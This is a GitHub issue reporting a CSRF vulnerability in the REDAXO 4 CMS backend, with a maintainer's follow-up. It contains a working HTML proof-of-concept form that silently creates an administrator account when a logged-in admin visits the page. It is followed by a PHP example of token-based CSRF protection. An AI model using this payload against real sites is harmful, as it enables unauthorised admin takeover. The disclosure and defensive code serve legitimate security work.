This repository has been archived by the owner on Jan 1, 2020. It is now read-only.

There is a CSRF vulnerability that can add an administrator #420

Closed
riyir opened this issue Aug 11, 2018 · 1 comment
Comments

@riyir

riyir commented Aug 11, 2018

  • After an administrator logs in, there is a CSRF vulnerability that can add an administrator via /redaxo4-master/redaxo/index.php?page=user
  • PoC
  • csrf.html
```html
<html>
  <body>
  <!-- Replaces the PoC page's own URL in the address bar with "/" -->
  <script>history.pushState('', '', '/')</script>
    <!-- Target: the REDAXO 4 backend user page; the browser attaches the victim's session cookie -->
    <form action="http://192.168.98.61/redaxo4-master/redaxo/index.php" method="POST">
      <input type="hidden" name="page" value="user" />
      <input type="hidden" name="save" value="1" />
      <input type="hidden" name="FUNC_ADD" value="1" />
      <input type="hidden" name="userlogin" value="bbb" />
      <input type="hidden" name="userpsw" value="bbbbbb" />
      <input type="hidden" name="username" value="Administrator" />
      <input type="hidden" name="userdesc" value="bbbbbb" />
      <!-- useradmin=1 makes the created account an administrator -->
      <input type="hidden" name="useradmin" value="1" />
      <input type="hidden" name="userstatus" value="1" />
      <input type="hidden" name="userperm_sprachen[]" value="0" />
      <input type="hidden" name="userperm_be_sprache" value="" />
      <input type="hidden" name="userperm_startpage" value="" />
      <!-- Submit-button label as captured from a Chinese-localised backend ("Add user") -->
      <input type="hidden" name="function" value="添加用户" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
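
An added example, not code from the report above or from the REDAXO project: the synchronizer-token check that a handler like index.php?page=user needs in order to reject the form above. It is PHP, like REDAXO 4, and reduces the handler to the one decision that matters. The function names, the `_csrf_token` field, the `$session` array standing in for `$_SESSION`, the `user_add` form id and the host `cms.example` are this example's own assumptions.

```php
<?php
// Added example (not REDAXO code): synchronizer-token CSRF protection for an
// "add user" POST handler such as the one the report above targets.
// $session stands in for $_SESSION; csrf_token_for(), csrf_verify(),
// same_origin() and handle_user_save() are names chosen for this example.

declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_tokens';

// Issue (or reuse) a per-form token, stored server-side in the session and
// rendered into the real form as <input type="hidden" name="_csrf_token">.
function csrf_token_for(array &$session, string $formId): string
{
    if (!isset($session[CSRF_SESSION_KEY][$formId])) {
        $session[CSRF_SESSION_KEY][$formId] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY][$formId];
}

// Verify the submitted token. A missing or empty token is rejected outright;
// hash_equals() compares in constant time so the token does not leak via timing.
function csrf_verify(array $session, string $formId, array $post): bool
{
    $expected = $session[CSRF_SESSION_KEY][$formId] ?? null;
    $given = $post['_csrf_token'] ?? null;
    if (!is_string($expected) || !is_string($given) || $given === '') {
        return false;
    }
    return hash_equals($expected, $given);
}

// Defence in depth: when the browser sent Origin or Referer, its host must be
// ours. An absent header is tolerated because some clients strip it; the token
// check above remains the primary control.
function same_origin(array $server, string $expectedHost): bool
{
    foreach (['HTTP_ORIGIN', 'HTTP_REFERER'] as $header) {
        if (!empty($server[$header])) {
            $host = parse_url($server[$header], PHP_URL_HOST);
            return is_string($host) && strcasecmp($host, $expectedHost) === 0;
        }
    }
    return true;
}

// The handler under discussion, reduced to the decision the report says is
// missing. Returns a label instead of writing to the database.
function handle_user_save(array &$session, array $post, array $server): string
{
    $isAdd = ($post['page'] ?? '') === 'user'
        && ($post['save'] ?? '') === '1'
        && isset($post['FUNC_ADD']);
    if (!$isAdd) {
        return 'ignored';
    }
    if (!csrf_verify($session, 'user_add', $post) || !same_origin($server, 'cms.example')) {
        return 'rejected';
    }
    // Only past this point would the real handler INSERT the new user row.
    return 'created';
}

// Demo with constructed requests. The first mirrors the PoC's fields and
// carries no token; the second adds the token the server issued.
$session = [];
$token = csrf_token_for($session, 'user_add');

$attackerPost = ['page' => 'user', 'save' => '1', 'FUNC_ADD' => '1',
                 'userlogin' => 'bbb', 'userpsw' => 'bbbbbb', 'useradmin' => '1'];
$attackerServer = ['HTTP_ORIGIN' => 'http://attacker.example'];
echo 'cross-site POST without token: ', handle_user_save($session, $attackerPost, $attackerServer), PHP_EOL;

$legitPost = $attackerPost + ['_csrf_token' => $token];
$legitServer = ['HTTP_ORIGIN' => 'http://cms.example'];
echo 'same-origin POST with token:    ', handle_user_save($session, $legitPost, $legitServer), PHP_EOL;
```

Run it with `php csrf_fix.php` (the filename is arbitrary). The token is bound to the session rather than the request, so an attacker's page cannot read or forge it, and the origin check catches the case where a token leaks but the request still comes from another site.
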

@staabm
Member

staabm commented Aug 16, 2018

Thank you for the report.

Could you describe a bit further how exactly (using which parameter) the vulnerability materializes?

Which Redaxo4 version do you use?

@gharlan gharlan closed this as completed Jan 1, 2020